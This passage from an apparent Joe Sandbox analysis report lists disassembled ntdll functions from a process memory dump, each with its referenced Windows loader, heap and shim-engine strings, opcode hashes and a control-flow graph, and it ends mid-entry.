                                                • Instruction Fuzzy Hash: 19A1D075A043128FD714CF28D898A5AB7E5FF88B24F25456DE946DB361EB30EC02CB91
                                                Function 1FDA7630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1505 1fda7630-1fda7651 1506 1fda768b-1fda7699 call 1fdb4c30 1505->1506 1507 1fda7653-1fda766f call 1fd7e660 1505->1507 1512 1fde4638 1507->1512 1513 1fda7675-1fda7682 1507->1513 1516 1fde463f-1fde4645 1512->1516 1514 1fda769a-1fda76a9 call 1fda7818 1513->1514 1515 1fda7684 1513->1515 1521 1fda76ab-1fda76c1 call 1fda77cd 1514->1521 1522 1fda7701-1fda770a 1514->1522 1515->1506 1518 1fde464b-1fde46b8 call 1fdff290 call 1fdb9020 RtlDebugPrintTimes BaseQueryModuleData 1516->1518 1519 1fda76c7-1fda76d0 call 1fda7728 1516->1519 1518->1519 1537 1fde46be-1fde46c6 1518->1537 1519->1522 1530 1fda76d2 1519->1530 1521->1516 1521->1519 1528 1fda76d8-1fda76e1 1522->1528 1532 1fda770c-1fda770e 1528->1532 1533 1fda76e3-1fda76f2 call 1fda771b 1528->1533 1530->1528 1534 1fda76f4-1fda76f6 1532->1534 1533->1534 1539 1fda76f8-1fda76fa 1534->1539 1540 1fda7710-1fda7719 1534->1540 1537->1519 1541 1fde46cc-1fde46d3 1537->1541 1539->1515 1542 1fda76fc 1539->1542 1540->1539 1541->1519 1543 1fde46d9-1fde46e4 1541->1543 1544 1fde47be-1fde47d0 call 1fdb2c50 1542->1544 1546 1fde46ea-1fde4723 call 1fdff290 call 1fdbaaa0 1543->1546 1547 1fde47b9 call 1fdb4d48 1543->1547 1544->1515 1554 1fde473b-1fde476b call 1fdff290 1546->1554 1555 1fde4725-1fde4736 call 1fdff290 1546->1555 1547->1544 1554->1519 1560 1fde4771-1fde477f call 1fdba770 1554->1560 1555->1522 1563 1fde4786-1fde47a3 call 1fdff290 call 1fdecf9e 1560->1563 1564 1fde4781-1fde4783 1560->1564 1563->1519 1569 1fde47a9-1fde47b2 1563->1569 1564->1563 1569->1560 1570 1fde47b4 1569->1570 1570->1519
                                                Strings
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1FDE4655
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 1FDE4787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1FDE4725
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1FDE46FC
                                                • Execute=1, xrefs: 1FDE4713
                                                • ExecuteOptions, xrefs: 1FDE46A0
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1FDE4742
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 99e78e9ab6e3efaff9781b0ddaef3541553e4e5b5058574e2fef645f2420f150
                                                • Instruction ID: 1edf61cc325121e6b43a2bf18be3846727f7cf09082614bec2cb3c3e58dd7bf5
                                                • Opcode Fuzzy Hash: 99e78e9ab6e3efaff9781b0ddaef3541553e4e5b5058574e2fef645f2420f150
                                                • Instruction Fuzzy Hash: 24511639600319ABDF90ABA4DC85FFE73B8AB05304F050199D506AB1D1EB72AA45CBA4
                                                Function 1FE1F525 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 231timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap$ocessId
                                                • API String ID: 3446177414-1414096851
                                                • Opcode ID: b3b1c652bed8168827b24c4aae3d0e9cd7803dd075a3146c3b514aa5c098696b
                                                • Instruction ID: 4b044cfa5633f971f826b33ec5b59671c7d2bf9eff1d80df3eaa3e3eff36bc4b
                                                • Opcode Fuzzy Hash: b3b1c652bed8168827b24c4aae3d0e9cd7803dd075a3146c3b514aa5c098696b
                                                • Instruction Fuzzy Hash: D391F435904785DFCB01CF69C480AEDBBF2FF5A328F14405AE4459F6A1DB36A946CBA0
                                                Function 1FD8A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                Download Yara Rule
                                                Strings
                                                • SsHd, xrefs: 1FD8A3E4
                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1FDD7AE6
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1FDD79FA
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1FDD79D5
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1FDD79D0, 1FDD79F5
                                                • Actx , xrefs: 1FDD7A0C, 1FDD7A73
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                • API String ID: 0-1988757188
                                                • Opcode ID: 076cc92e429f163aadf9419e55ebfcfaeecdef6783e98171c63a28c10bff53ac
                                                • Instruction ID: 40dc1d7cbb9df524af1d24dd2ede5938c8d2d13b02ec4b919624f2533fa23fd0
                                                • Opcode Fuzzy Hash: 076cc92e429f163aadf9419e55ebfcfaeecdef6783e98171c63a28c10bff53ac
                                                • Instruction Fuzzy Hash: 6EE1C171604742AFD795CE28C884B7AB7E1AF85314F114B6DF895CB2D0E731E985CB42
                                                Function 1FD8D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • GsHd, xrefs: 1FD8D874
                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1FDD9565
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1FDD936B
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1FDD9346
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1FDD9341, 1FDD9366
                                                • Actx , xrefs: 1FDD9508
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                • API String ID: 3446177414-2196497285
                                                • Opcode ID: 7df13335721598efff72db2d598b5e6e86241f3b24dd8df4c025172b8867a244
                                                • Instruction ID: daaa346cdfab5acfabf315affdd13061b6e5f426d7a202beda2cfac16a9b89a9
                                                • Opcode Fuzzy Hash: 7df13335721598efff72db2d598b5e6e86241f3b24dd8df4c025172b8867a244
                                                • Instruction Fuzzy Hash: 17E1A0746083428FDB90DF64C890B6AB7F5BF88318F144A2DF9969B2C1D771E944CB92
                                                Function 1FD6645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 1FD6656C
                                                  • Part of subcall function 1FD665B5: RtlDebugPrintTimes.NTDLL ref: 1FD66664
                                                  • Part of subcall function 1FD665B5: RtlDebugPrintTimes.NTDLL ref: 1FD666AF
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 1FDC9A11, 1FDC9A3A
                                                • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 1FDC99ED
                                                • Getting the shim user exports failed with status 0x%08lx, xrefs: 1FDC9A01
                                                • LdrpInitShimEngine, xrefs: 1FDC99F4, 1FDC9A07, 1FDC9A30
                                                • apphelp.dll, xrefs: 1FD66496
                                                • Loading the shim user DLL failed with status 0x%08lx, xrefs: 1FDC9A2A
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-204845295
                                                • Opcode ID: c2e1205aa3ecc2e8e0df58c2c6a0529f98b0240b49c1d2de21a270a78badd297
                                                • Instruction ID: 9b46be7dffcf3d5feb7e350b5d415afc1b782fe9e8bf474a15c444cdcefaf422
                                                • Opcode Fuzzy Hash: c2e1205aa3ecc2e8e0df58c2c6a0529f98b0240b49c1d2de21a270a78badd297
                                                • Instruction Fuzzy Hash: 5C51C4B52183049FD391DF24C891BBB7BE4EF84764F00091DF5869B2A0E631E904CBA3
                                                Function 1FDEFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                • API String ID: 3446177414-4227709934
                                                • Opcode ID: 14dd44069eae2ff41d142bc8e239d03dc9e032985ff0feb7db49760cb44f32a5
                                                • Instruction ID: ba5f73170e2e01bccd78347c823d1230e17e768fceb253700b4d0d53c5b0ea47
                                                • Opcode Fuzzy Hash: 14dd44069eae2ff41d142bc8e239d03dc9e032985ff0feb7db49760cb44f32a5
                                                • Instruction Fuzzy Hash: A7419175901249AFCB41DF99C880AEEBBB5FF88714F100159E854A7342D732FD16DBA0
                                                Function 1FD665B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • LdrpLoadShimEngine, xrefs: 1FDC9ABB, 1FDC9AFC
                                                • minkernel\ntdll\ldrinit.c, xrefs: 1FDC9AC5, 1FDC9B06
                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1FDC9AF6
                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1FDC9AB4
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimuser$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-3589223738
                                                • Opcode ID: 564ede5f3ba158685f94ff9147c1f0f1309340c91ec87d342aa21f7bbb99593c
                                                • Instruction ID: f3dc27924803dec450711637edf9606b6bfccde5a7038a5890b8aa3e459cb069
                                                • Opcode Fuzzy Hash: 564ede5f3ba158685f94ff9147c1f0f1309340c91ec87d342aa21f7bbb99593c
                                                • Instruction Fuzzy Hash: 9651F5B66103589FCB44DBB8CC98AFE77A2BB81334F050159E452AF295DB71BC54CBA0
                                                Function 1FE1F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • Entry Heap Size , xrefs: 1FE1F26D
                                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1FE1F263
                                                • ---------------------------------------, xrefs: 1FE1F279
                                                • HEAP: , xrefs: 1FE1F15D
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                • API String ID: 3446177414-1102453626
                                                • Opcode ID: d1c6dc9a665935ba0422891d726b67cbfddb4b7a05cc294da3fea52a81ebddd2
                                                • Instruction ID: 3dfac9fbb813e62f68f951c6dcb0abda0cf159fb8a9eaf40b736021b713285be
                                                • Opcode Fuzzy Hash: d1c6dc9a665935ba0422891d726b67cbfddb4b7a05cc294da3fea52a81ebddd2
                                                • Instruction Fuzzy Hash: 33419E39A05269DFC704DF19C48895A7BE6FF8A378B16816AD4189F311D732FC02CB90
                                                Function 1FE46940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                • Instruction ID: e7be25a44100b016f85d940895e8dbead85d06437a6c3ecef9e20af223cfb065
                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                • Instruction Fuzzy Hash: DC02F6B5508341AFD305CF28D890A6BBBE5FFC8704F608A2DF9958B264DB31E905CB52
                                                Function 1FDBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 9c7896cd73c285ddd42ccffc7133345847390caa0226fc933a616f85858b898b
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: F7818174E053499FDBA4CF64C8517FEBBA1AF47310F18425DD893AB291D634A841CB61
                                                Function 1FD79126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
                                                • API String ID: 3446177414-1194432280
                                                • Opcode ID: 8e8f7e1ed73dafd6bb15db2fe2caa0131fbfac3cd3ab5389e9f7f45edceef0f0
                                                • Instruction ID: 799cd43458c8dc20f68b7498462daed6f0fcaaadb53c39746ad45e9b2379873b
                                                • Opcode Fuzzy Hash: 8e8f7e1ed73dafd6bb15db2fe2caa0131fbfac3cd3ab5389e9f7f45edceef0f0
                                                • Instruction Fuzzy Hash: C181FA76D003699BDB61CF54CC45BEEB7B8AF48754F0041DAE91AB7280E7306E858FA1
                                                Function 1FDA4D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • LdrpFindDllActivationContext, xrefs: 1FDE3636, 1FDE3662
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1FDE362F
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 1FDE3640, 1FDE366C
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 1FDE365C
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 3446177414-3779518884
                                                • Opcode ID: 1d6e8faa12737efc7e7587011c0d4b058a1219d073e94312c29209b31dc19274
                                                • Instruction ID: 0ef87894fdd32d8dafe4ab29e7f46e0ccc050f045b5ca51a55817bbdeb98e336
                                                • Opcode Fuzzy Hash: 1d6e8faa12737efc7e7587011c0d4b058a1219d073e94312c29209b31dc19274
                                                • Instruction Fuzzy Hash: 53312E72900356AFDF91AB14C888BB672A4BB03764F07412AD4745B671EBA2FC84C79D
                                                Function 1FD9245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 1FDDA9A2
                                                • LdrpDynamicShimModule, xrefs: 1FDDA998
                                                • apphelp.dll, xrefs: 1FD92462
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1FDDA992
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: 67185ae94f1ec7ff02cbcae61850164323da64ba7c80b29b79a2b73174783a3b
                                                • Instruction ID: 9841be2ac8f88d43fd4fa82d2ea92fafa1b171f125e009666183c009ba87f805
                                                • Opcode Fuzzy Hash: 67185ae94f1ec7ff02cbcae61850164323da64ba7c80b29b79a2b73174783a3b
                                                • Instruction Fuzzy Hash: C7316AB5600316AFD750AF68C8C4ABB77B4FB81734F124119F411AB2C1D771B851CB91
                                                Function 1FE220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 185308e9ca8150475fa6f7c09777d70ae25b777c392e68178cadfe5c78d012e1
                                                • Instruction ID: ee5c58c516fa0a6c2805835d6ef8a8b6056cacdbf73b65cdab62560d7318b143
                                                • Opcode Fuzzy Hash: 185308e9ca8150475fa6f7c09777d70ae25b777c392e68178cadfe5c78d012e1
                                                • Instruction Fuzzy Hash: DE216076A00219ABEB10DF79CC44EFE7BF8EF45654F45012AE905E7240FB30EA059BA1
                                                Function 1FD9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 1FDE031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1FDE02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1FDE02E7
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 90493d85538008edf897cc649f18d1f31dec8b027ab2772e7f42821e5343c95b
                                                • Instruction ID: d61071204a351c8e603734dd90ad7e0090101b2dfc7533274491f5ed4d9a05a5
                                                • Opcode Fuzzy Hash: 90493d85538008edf897cc649f18d1f31dec8b027ab2772e7f42821e5343c95b
                                                • Instruction Fuzzy Hash: 72E1BF756047419FD791CF68C884B6AB7E0BF85324F100AADF4A9CB2E1E774E846CB52
                                                Function 1FD90BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 1FDDA121
                                                • LdrpCheckModule, xrefs: 1FDDA117
                                                • Failed to allocated memory for shimmed module list, xrefs: 1FDDA10F
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-161242083
                                                • Opcode ID: d7d6b927e8583a989a66fe995839b839405e70240cfedc1bcf7e93462d8b6e7f
                                                • Instruction ID: d8daf2c9fe40e003f5537f1f97aa3b55d5afe20889f0a140743e762a66982f93
